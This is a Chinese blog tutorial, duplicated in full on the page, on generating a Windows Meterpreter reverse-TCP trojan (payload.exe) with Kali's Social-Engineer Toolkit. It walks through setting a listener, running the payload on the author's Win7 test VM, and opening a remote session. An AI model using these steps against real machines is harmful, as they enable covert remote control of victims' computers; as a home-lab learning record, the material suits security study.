最新消息: USBMI致力于为网友们分享Windows、安卓、IOS等主流手机系统相关的资讯以及评测、同时提供相关教程、应用、软件下载等服务。

【kali

互联网 admin 14浏览 0评论

【kali

目录

远控木马

简介:

1.1、第一步:启动SET

1.2、第二步:选择模块

1.3、第三步:payload选择

1.4、第四步:payload设置

1.5、第五步:返回信息

1.6、第六步:建立会话

1.7、第七步:利用


远控木马

简介:

SET 同时集成了木马生成工具,可以生成木马并调用MSF框架对远程主机进行控制

1.1、第一步:启动SET

输入sudo setoolkit

(或者在工具菜单中找到后打开)

输出的信息详细的介绍了SET。该信息在第一次运行时, 才会显示

接受这部分信息后, 才可进行其他操作。


输入y

 显示了社会工程学工具包的创建者、版本、代号及菜单信息

选择相应的编号进行操作

   1) Social-Engineering Attacks
社会工程攻击2) Penetration Testing (Fast-Track)
渗透测试(快速轨道)3) Third Party Modules
第三方模块4) Update the Social-Engineer Toolkit
更新社交工程工具包5) Update SET configuration
更新设置配置6) Help, Credits, and About
帮助,学分等

1.2、第二步:选择模块

选择攻击社会工程学,在菜单中的编号为1

输入1

显示了攻击社会工程学的菜单选项, 这时就可以选择攻击工程学的类型, 然后进行攻击

 

   1) Spear-Phishing Attack Vectors
鱼叉式钓鱼攻击向量2) Website Attack Vectors
网站攻击向量3) Infectious Media Generator
感染性媒体生成器4) Create a Payload and Listener
创建有效载荷和侦听器5) Mass Mailer Attack
大众邮件攻击6) Arduino-Based Attack Vector
基于Arduino的攻击向量7) Wireless Access Point Attack Vector
无线访问点攻击矢量8) QRCode Generator Attack Vector
二维码攻击向量9) Powershell Attack Vectors
Powershell攻击向量10) Third Party Modules
第三方模块

1.3、第三步:payload选择

输入编号4,创建有效载荷和侦听器

1) Windows Shell Reverse_TCP               在受害者身上产生指挥外壳,然后寄回攻击者
2) Windows Reverse_TCP Meterpreter         在受害者身上产生仪表壳,然后寄回攻击者
3) Windows Reverse_TCP VNC DLL             在受害者上产生VNC服务器并将其发送回攻击者
4) Windows Shell Reverse_TCP X64           Windows X64命令外壳,反向TCP内联
5) Windows Meterpreter Reverse_TCP X64     连接回攻击者(Windows X64),MeterPreter
6) Windows Meterpreter Egress Buster       产生仪表式外壳,并通过多个端口找到港口房屋
7) Windows Meterpreter Reverse HTTPS       使用SSL通过HTTP通过隧道通信并使用MeterPreter
8) Windows Meterpreter Reverse DNS         使用主机名代替IP地址,并使用反向计量表
9) Download/Run your Own Executable        下载可执行文件并运行它

1.4、第四步:payload设置

选择Windows Reverse_TCP Meterpreter,在受害者身上产生仪表壳,然后寄回攻击者

输入2

设置监听的主机IP(攻击机IP地址)和端口

下面是在本地生成的木马程序payload.exe

 

 /root/.set/

(需要使用root权限打开)

1.5、第五步:返回信息

放到目标主机中(我直接拖过去失败了)

 是exe后缀,但是打开以后

好像是个文件夹

 就要考虑使用其他方式上传/下载到目标主机


为了测试我在虚拟机上下载了wmtool

(原文件路径(可能)和共享文件路径都需要root权限)

在win11里面就能看见了


为了安全起见我移动到了win7中(虚拟机)

点击运行

观察kali变化

(我点击运行了2次)

在这千万别和我一样傻等

按回车键(哈哈哈)

 

1.6、第六步:建立会话

查看会话

输入sessions -i

激活第二条会话

输入sessions -i 2

(获得 Shell 后即可操控 Win 7 靶机)

1.7、第七步:利用

执行命令,截图,提权……

sysinfo
ls

 

【kali

目录

远控木马

简介:

1.1、第一步:启动SET

1.2、第二步:选择模块

1.3、第三步:payload选择

1.4、第四步:payload设置

1.5、第五步:返回信息

1.6、第六步:建立会话

1.7、第七步:利用


远控木马

简介:

SET 同时集成了木马生成工具,可以生成木马并调用MSF框架对远程主机进行控制

1.1、第一步:启动SET

输入sudo setoolkit

(或者在工具菜单中找到后打开)

输出的信息详细的介绍了SET。该信息在第一次运行时, 才会显示

接受这部分信息后, 才可进行其他操作。


输入y

 显示了社会工程学工具包的创建者、版本、代号及菜单信息

选择相应的编号进行操作

   1) Social-Engineering Attacks
社会工程攻击2) Penetration Testing (Fast-Track)
渗透测试(快速轨道)3) Third Party Modules
第三方模块4) Update the Social-Engineer Toolkit
更新社交工程工具包5) Update SET configuration
更新设置配置6) Help, Credits, and About
帮助,学分等

1.2、第二步:选择模块

选择攻击社会工程学,在菜单中的编号为1

输入1

显示了攻击社会工程学的菜单选项, 这时就可以选择攻击工程学的类型, 然后进行攻击

 

   1) Spear-Phishing Attack Vectors
鱼叉式钓鱼攻击向量2) Website Attack Vectors
网站攻击向量3) Infectious Media Generator
感染性媒体生成器4) Create a Payload and Listener
创建有效载荷和侦听器5) Mass Mailer Attack
大众邮件攻击6) Arduino-Based Attack Vector
基于Arduino的攻击向量7) Wireless Access Point Attack Vector
无线访问点攻击矢量8) QRCode Generator Attack Vector
二维码攻击向量9) Powershell Attack Vectors
Powershell攻击向量10) Third Party Modules
第三方模块

1.3、第三步:payload选择

输入编号4,创建有效载荷和侦听器

1) Windows Shell Reverse_TCP               在受害者身上产生指挥外壳,然后寄回攻击者
2) Windows Reverse_TCP Meterpreter         在受害者身上产生仪表壳,然后寄回攻击者
3) Windows Reverse_TCP VNC DLL             在受害者上产生VNC服务器并将其发送回攻击者
4) Windows Shell Reverse_TCP X64           Windows X64命令外壳,反向TCP内联
5) Windows Meterpreter Reverse_TCP X64     连接回攻击者(Windows X64),MeterPreter
6) Windows Meterpreter Egress Buster       产生仪表式外壳,并通过多个端口找到港口房屋
7) Windows Meterpreter Reverse HTTPS       使用SSL通过HTTP通过隧道通信并使用MeterPreter
8) Windows Meterpreter Reverse DNS         使用主机名代替IP地址,并使用反向计量表
9) Download/Run your Own Executable        下载可执行文件并运行它

1.4、第四步:payload设置

选择Windows Reverse_TCP Meterpreter,在受害者身上产生仪表壳,然后寄回攻击者

输入2

设置监听的主机IP(攻击机IP地址)和端口

下面是在本地生成的木马程序payload.exe

 

 /root/.set/

(需要使用root权限打开)

1.5、第五步:返回信息

放到目标主机中(我直接拖过去失败了)

 是exe后缀,但是打开以后

好像是个文件夹

 就要考虑使用其他方式上传/下载到目标主机


为了测试我在虚拟机上下载了wmtool

(原文件路径(可能)和共享文件路径都需要root权限)

在win11里面就能看见了


为了安全起见我移动到了win7中(虚拟机)

点击运行

观察kali变化

(我点击运行了2次)

在这千万别和我一样傻等

按回车键(哈哈哈)

 

1.6、第六步:建立会话

查看会话

输入sessions -i

激活第二条会话

输入sessions -i 2

(获得 Shell 后即可操控 Win 7 靶机)

1.7、第七步:利用

执行命令,截图,提权……

sysinfo
ls

 

发布评论

评论列表 (0)

  1. 暂无评论